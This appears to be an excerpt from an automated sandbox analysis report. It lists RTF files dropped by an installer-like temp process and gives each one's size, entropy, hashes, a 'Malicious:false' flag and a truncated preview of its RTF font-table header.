                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44042
                                                                                                                                                                                                                                                          Entropy (8bit):5.0382315831173985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+EpRx1IKZR1yc+rROcPI0QhhiLVRtvYq14MfzCJrUwQpd8HZ/6A9u:2QDFUnUIA9u
                                                                                                                                                                                                                                                          MD5:C87126C1EBFECCC1BE9D35D2C25360F3
                                                                                                                                                                                                                                                          SHA1:9968DE7D3CAA691A6EB0E643E643C34B7B044F55
                                                                                                                                                                                                                                                          SHA-256:0965D39B40A80B7EF5452ACEEEC9CE43CC5C8D6762617F8FF907444377844D14
                                                                                                                                                                                                                                                          SHA-512:0AA0315529CA2C5D04F4A5BF4DE4991C2F8551AA38559D5C6AAD87F363B1D806457C3F33274873CFCF661646FBE2F730A4461D6ADE66C2DB36BD13AFAD5F1849
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39768
                                                                                                                                                                                                                                                          Entropy (8bit):5.028438731643848
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2zFUZ47+E29oy2lV9GEij/R0qrsT+118lsqZ/6A9B:2zdTIA9B
                                                                                                                                                                                                                                                          MD5:A8C9AB020E61A95F3CBA163ABBF94E88
                                                                                                                                                                                                                                                          SHA1:041D13002452D2AC0CBE8A2CC4D646B284F1B9C6
                                                                                                                                                                                                                                                          SHA-256:2473E996CFF9D4ACA06608370BF1B5C0ACE937E4F8A1C699AAF2A5F87318D40F
                                                                                                                                                                                                                                                          SHA-512:13FB3383203232496A3551F2D6A39F210432C5DAB33A4101564416A0069E72F86F85C000EB8ABA4C2D8E66FB7B6165A34CD60DA0A8DFA0A48165F358B2E01269
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78843
                                                                                                                                                                                                                                                          Entropy (8bit):4.977552271527579
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFfTw1wko5DlJXCrfTYlD2oC+zKjkMpAkVZEdvI9vTwliBKMkZKU4B3dHlbZBG4:2FuLTwlsdfmIA9U
                                                                                                                                                                                                                                                          MD5:410CC0145DFADC0855A7081EC0808E79
                                                                                                                                                                                                                                                          SHA1:4DB58BD6606D3266E9C3775CE5B41333DE38EC03
                                                                                                                                                                                                                                                          SHA-256:D9C2247313A637FB992DCC176C9D96A06A891EA76F78E373FF038532FCC5EEBF
                                                                                                                                                                                                                                                          SHA-512:B7B85D67CE8756DB341CD324592308AD6662D853E0CC08B3A64B09FB9D40D21B945EF1F4EEA8DF7DA92F281BED4B92930F81A0EDBEB7498CE03056AC0DF370CE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):51468
                                                                                                                                                                                                                                                          Entropy (8bit):5.04658714654288
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f15+0UcENgVVhGPNIlV9GEijaKcAPv6SAJjmYWR8KdYJ2nkfleSQ+:2e78tYiIA9U
                                                                                                                                                                                                                                                          MD5:80A5E124BF233B48028E3886DE7897EB
                                                                                                                                                                                                                                                          SHA1:F21E4120B6E2C4CABB5A2640AA208E9A94E193B7
                                                                                                                                                                                                                                                          SHA-256:99807A4CF83C65D73CA39ADCC5058B28CA17812102304288420BAF9091DCDACE
                                                                                                                                                                                                                                                          SHA-512:8168FB4A5E19938352E6E2662330214FB4A4209BD015F9615E3308FB808633EF346BAD56ED85B9946D8B40F87680B8B09B3676EF9591BDD27131A3C5842423D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45546
                                                                                                                                                                                                                                                          Entropy (8bit):5.037437776894658
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+HE1KEKT2njX8x3FPzX3Mmwx1DVw22vR4YaxZ8Y21kNFp6VpXGEy5Z/61:2QDnocIA9K
                                                                                                                                                                                                                                                          MD5:04CD296601A182A19484D83613BC117B
                                                                                                                                                                                                                                                          SHA1:3ACCD6A59B0E72F4FC2D6559D9C31A89C25383B9
                                                                                                                                                                                                                                                          SHA-256:0ABEDA0EF9D4D06BC44EDFF51C9A289DBA0F58A672731F0F8A1B09AFCFD7C9B7
                                                                                                                                                                                                                                                          SHA-512:12241D241CB7FE1A79009E1B4BEB7E9051A5523A3A4182BC19E52EAA3FED4D334822D4DD2E8F2DC3EA56AD32E121C7D69D0C7EB1D1495C5132DC460B5002D0E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46096
                                                                                                                                                                                                                                                          Entropy (8bit):5.034181446312948
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFU347wx2Oa75aEZM/rvg20xQBcqtqYepjRBcnjX8x3b99QONKaQB2Ctj+Z/6AI:2Fp7FIA9u
                                                                                                                                                                                                                                                          MD5:B8B7FAFEA8A56DF708E8CE7BB37516F2
                                                                                                                                                                                                                                                          SHA1:FA15A15E9BD2B99CE60BDF170FBD668F89D87C7C
                                                                                                                                                                                                                                                          SHA-256:E28805183757391F057ADA505CD5648E029FBB4D3DBCDDB9B19B8135A11EC113
                                                                                                                                                                                                                                                          SHA-512:C8D9F66F94D32353F59FF2A28153647906B01ECE715A764BA33B907E81B27AE411FE951ECDD039A9BD596B7EEA1CD9CC802991EE74BB8FF71A1BE051B6CC32A3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):59955
                                                                                                                                                                                                                                                          Entropy (8bit):4.987423779028573
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFbLxZjkouUyWXCrfTYlD2oC+zKjkMpAkVZEdvI9DFxg1946VKOFeOkOecLd6Pa:2FLIFxgCSIA9TkWIy
                                                                                                                                                                                                                                                          MD5:E0ED1922B52E062A733812CDC97F78ED
                                                                                                                                                                                                                                                          SHA1:FFE7CBE2173ABEC59FDD66949DF05FAE07310FBC
                                                                                                                                                                                                                                                          SHA-256:436533A19E5DB84BAFC7FC2A0DBECE56577648EF416D5A54C2D3A9D46289B9BB
                                                                                                                                                                                                                                                          SHA-512:95DF26BFFC5FD4B77773C460BDB438ACC4E1A3146E502C8D7FBECE9D29A842513E6C44DBFCB04BDB9682802CBE8BA6E49723C996A550EEB864392B71D184AE0B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50366
                                                                                                                                                                                                                                                          Entropy (8bit):5.042918546603945
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFMz47wCEnkVlYgiDGi3w2EHnT2njX8x37HzX3MmwxEJBMmfX8+VUf8SP8VrZJ6:2ebHcIA9/
                                                                                                                                                                                                                                                          MD5:479AE0F93EE93B62EDED9259EFD3D417
                                                                                                                                                                                                                                                          SHA1:ADFC98043F7B02403F496028274A9849DADE9415
                                                                                                                                                                                                                                                          SHA-256:AE39FDC0D0299C5CC2AE703E1F39CE87FB6317DFEFA3DD3957CC3C7BFC94233D
                                                                                                                                                                                                                                                          SHA-512:914EB7570D95563A23BCF6CFC354297C7A9ECE8F48AC1E6F872B7CCAB00B9977271A7148444E8DD119EC6BD7C4A4DB4830EC7EEBDE89FDE72E6A20B3E5DA2E91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial CYR;}{\f41\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flo
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54667
                                                                                                                                                                                                                                                          Entropy (8bit):5.033087064941872
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDpxZMjE/d8NwyHF2njX8x3l7G5V5V5h5G5P5N5gkBJ5qA23YtFZSEHtoGCzU/:2Q9svIA9h
                                                                                                                                                                                                                                                          MD5:51AF8BBE0EB54E295570F088C17CBBA4
                                                                                                                                                                                                                                                          SHA1:E8CD73723EB618FA3F9A26B7F56EAA0C9397F0C9
                                                                                                                                                                                                                                                          SHA-256:E9E9F0B183F57BEA6BF02B6BDCBAB45B8BACDFF889CD4E6882E62C3E3F8CC4C8
                                                                                                                                                                                                                                                          SHA-512:582D0EB523E3AA4F152A858DD15C10F5379BA981EAAC75A5B427BCE8287634AF3D14D8AC045754B5FE3BEC9CAC317EC324D72EC2519C11FAE2A9FE3D60FD1F15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):59955
                                                                                                                                                                                                                                                          Entropy (8bit):4.987423779028573
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFbLxZjkouUyWXCrfTYlD2oC+zKjkMpAkVZEdvI9DFxg1946VKOFeOkOecLd6Pa:2FLIFxgCSIA9TkWIy
                                                                                                                                                                                                                                                          MD5:E0ED1922B52E062A733812CDC97F78ED
                                                                                                                                                                                                                                                          SHA1:FFE7CBE2173ABEC59FDD66949DF05FAE07310FBC
                                                                                                                                                                                                                                                          SHA-256:436533A19E5DB84BAFC7FC2A0DBECE56577648EF416D5A54C2D3A9D46289B9BB
                                                                                                                                                                                                                                                          SHA-512:95DF26BFFC5FD4B77773C460BDB438ACC4E1A3146E502C8D7FBECE9D29A842513E6C44DBFCB04BDB9682802CBE8BA6E49723C996A550EEB864392B71D184AE0B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78843
                                                                                                                                                                                                                                                          Entropy (8bit):4.977552271527579
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFfTw1wko5DlJXCrfTYlD2oC+zKjkMpAkVZEdvI9vTwliBKMkZKU4B3dHlbZBG4:2FuLTwlsdfmIA9U
                                                                                                                                                                                                                                                          MD5:410CC0145DFADC0855A7081EC0808E79
                                                                                                                                                                                                                                                          SHA1:4DB58BD6606D3266E9C3775CE5B41333DE38EC03
                                                                                                                                                                                                                                                          SHA-256:D9C2247313A637FB992DCC176C9D96A06A891EA76F78E373FF038532FCC5EEBF
                                                                                                                                                                                                                                                          SHA-512:B7B85D67CE8756DB341CD324592308AD6662D853E0CC08B3A64B09FB9D40D21B945EF1F4EEA8DF7DA92F281BED4B92930F81A0EDBEB7498CE03056AC0DF370CE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48087
                                                                                                                                                                                                                                                          Entropy (8bit):5.042429118311867
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/fB5+aWqeNgVVhGPNNlV9GEijSKcAPv6SAJjeR+RP8yJ0LTrI6JtOt:2e7dRRoIA9f
                                                                                                                                                                                                                                                          MD5:4BF6C8774BA58F01B8916C5DDD525E82
                                                                                                                                                                                                                                                          SHA1:F493778C8F8CBD77CC9FC11F1E628FD05C6B0F87
                                                                                                                                                                                                                                                          SHA-256:1D3481510B1220FF2BB3EFBC4137E73A237842AEC233E289EDE6039412FC1ACA
                                                                                                                                                                                                                                                          SHA-512:208BA94ECDB45A089AD16A665DA51C7C29267268DE83DFC4F44D8EE29805031DD79E9681E12F6D5C8CE9C8E13FAFB3CB9C5DA535712416D4941233E546A794A8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
